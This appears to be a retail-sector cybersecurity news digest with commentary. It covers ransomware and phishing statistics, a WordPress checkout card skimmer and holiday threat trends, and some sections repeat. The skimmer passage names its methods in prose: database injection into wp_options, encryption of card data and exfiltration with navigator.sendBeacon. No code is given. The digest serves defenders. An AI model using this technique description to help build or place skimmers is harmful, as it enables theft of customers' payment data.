The retail and hospitality industries face an intensifying array of cyber threats, with ransomware accounting for 30% of all reported incidents in 2024. These attacks have led to average operational downtimes of 72 hours and recovery costs reaching USD 1.4 million per incident. Phishing campaigns targeting customer data have increased by 22% year-over-year, while third-party supply chain breaches represent 41% of reported incidents. The impact extends to cryptocurrency fraud, with businesses reporting USD 450,000 in losses per incident. ReliaQuest's report emphasises the need for a defense-in-depth strategy, highlighting how intelligence-driven solutions and automation can significantly improve threat detection and response times. The findings underscore the critical importance of industry collaboration through organisations like RH-ISAC, particularly as cyber threats continue to evolve and target the sector's growing digital infrastructure.

IADS Notes: Recent cyber incidents underscore the report's findings about retail sector vulnerabilities. In March 2025, a single security update failure caused USD 5.4 billion in losses, while December 2024 saw a ransomware attack disrupting over 3,000 retailers' operations. The sophistication of threats is evident in January 2025 data showing 90% of successful cyberattacks begin with phishing, and the discovery of advanced card skimming malware targeting payment systems. El Corte Inglés's recent data breach through an external provider further demonstrates the critical importance of comprehensive security protocols and rapid incident response capabilities.

Uncovering critical cyber threats to retail and hospitality

What: A comprehensive analysis of cyber threats in retail reveals critical vulnerabilities across ransomware, phishing, and supply chain security, with third-party breaches accounting for 41% of reported incidents and average losses reaching USD 1.4 million per ransomware attack.

Why it is important: As retail operations become increasingly digitised and interconnected, understanding and addressing these cybersecurity vulnerabilities is crucial for protecting both business operations and customer trust in an industry that relies heavily on seamless digital transactions.

The retail and hospitality industries face an intensifying array of cyber threats, with ransomware accounting for 30% of all reported incidents in 2024. These attacks have led to average operational downtimes of 72 hours and recovery costs reaching USD 1.4 million per incident. Phishing campaigns targeting customer data have increased by 22% year-over-year, while third-party supply chain breaches represent 41% of reported incidents. The impact extends to cryptocurrency fraud, with businesses reporting USD 450,000 in losses per incident. ReliaQuest's report emphasises the need for a defense-in-depth strategy, highlighting how intelligence-driven solutions and automation can significantly improve threat detection and response times. The findings underscore the critical importance of industry collaboration through organisations like RH-ISAC, particularly as cyber threats continue to evolve and target the sector's growing digital infrastructure.

IADS Notes: Recent cyber incidents underscore the report's findings about retail sector vulnerabilities. In March 2025, a single security update failure caused USD 5.4 billion in losses, while December 2024 saw a ransomware attack disrupting over 3,000 retailers' operations. The sophistication of threats is evident in January 2025 data showing 90% of successful cyberattacks begin with phishing, and the discovery of advanced card skimming malware targeting payment systems. El Corte Inglés's recent data breach through an external provider further demonstrates the critical importance of comprehensive security protocols and rapid incident response capabilities.

KasadaIQ Insights: Refund Fraud

What: Security researchers have identified a new malware variant that compromises WordPress e-commerce sites through database manipulation, capturing credit card data during checkout while circumventing standard security protocols.

Why it is important: The emergence of this sophisticated malware highlights a critical vulnerability in retail payment infrastructure at a time when digital transactions represent 70% of global sales, threatening both merchant operations and customer trust.

A sophisticated credit card skimming malware, designated as malware.magento_shoplift.273, has emerged as a significant threat to WordPress-based e-commerce sites. The malware employs an innovative approach by injecting malicious JavaScript directly into the website's database, specifically targeting the wp_options table's widget_block entry. This method allows it to evade traditional security measures that focus on file-based malware detection.

The skimmer activates exclusively on checkout pages, either by hijacking legitimate payment fields or creating convincing fake credit card forms to capture sensitive data. The stolen information, including credit card numbers, CVV codes, and billing details, undergoes Base64 encoding and AES-CBC encryption before being transmitted to attacker-controlled domains. The malware's sophisticated design enables it to operate stealthily, using the navigator.sendBeacon function to exfiltrate data without disrupting normal user activity. This development presents a particular challenge for retail and hospitality sectors, where e-commerce platforms are crucial for daily operations.

IADS Notes: The discovery of this sophisticated card skimmer represents a concerning evolution in retail cybersecurity threats. In December 2024, Stripe blocked nearly 21 million fraudulent transactions worth USD 917 million during just one weekend, highlighting the scale of payment security challenges. The skimmer's technique mirrors the June 2024 Neiman Marcus breach, where attackers compromised cloud databases to access customer data. With mobile transactions now accounting for 70% of global sales, this threat is particularly significant for retailers navigating digital transformation while maintaining security.

Sophisticated card skimmer targets WordPress checkout pages via database injection

What: RH-ISAC has released its Holiday season cyber threat trends 2024.

Why it is important: For the retail, hospitality, and travel community, the holiday season is the most intense time of year for consumers and cybersecurity professionals facing persistent threats. From the beginning of October through the end of December, cyber threats to organizations expand in both scale and intensity to match the rise in consumer traffic.

The key takeaways of member analysts’ provide critical insight into the active defensive trends in the retail sector. Social engineering and fraud remain critical concerns, with

various types of fraud increasing dramatically in the current period. Organizations are seeing an increase in the prevalence of call-based social engineering, loyalty and gift card fraud, and DoS attacks.

Holiday season cyber threat trends 2024